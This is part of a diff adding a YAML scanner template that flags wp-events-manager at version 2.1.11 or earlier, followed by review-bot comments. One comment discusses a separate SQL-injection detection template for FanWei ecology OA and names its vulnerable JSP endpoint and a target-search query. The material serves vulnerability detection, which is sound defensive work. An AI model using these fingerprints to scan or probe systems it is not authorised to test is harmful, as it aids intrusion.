regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-events-manager" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.1.11') \ No newline at end of file
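Review bot: The rewritten template describes a SQL injection in `HrmCareerApplyPerView.jsp` on the ecology OA (`fofa-query: app="泛微-协同办公OA"`), yet it still lives at poc/upload/ecology_E-Office_upload.yaml and keeps `id: FanWei`, so the directory, filename and id all misdescribe the content; move it to a SQL-injection path with its own id. The match `contains(body_1, "c4ca")` checks only four hex characters of the expected MD5 of "1"; matching the full digest, `- 'contains(body_1, "c4ca4238a0b923820dcc509a6f75849b")'`, removes accidental hits on unrelated hex in the page. The description reads `FanWei There is a … sensitive information-`; `FanWei ecology has a SQL injection vulnerability in HrmCareerApplyPerView.jsp that can expose sensitive database information` fixes the phrasing and the stray hyphen. `condition: and` under a single dsl entry is a no-op and can be dropped.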
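Review bot: `description: >` is empty and `cvss-metrics:`, `cvss-score:` and `cve-id:` are bare keys that parse as null (yamllint `empty-values`), while `tags: cve,…` asserts a CVE exists; fill these from the referenced Wordfence advisory or drop the empty keys and the `cve` tag so consumers filtering on them are not misled. `shodan-query: 'vuln:'` is an unfilled placeholder and should be completed or removed. The `version` extractor appears twice, once `internal: true` and once exported; if that is intentional so the value is both usable in `compare_versions` and printed, a comment saying so would stop the next reader from deleting one. The file also ends without a trailing newline.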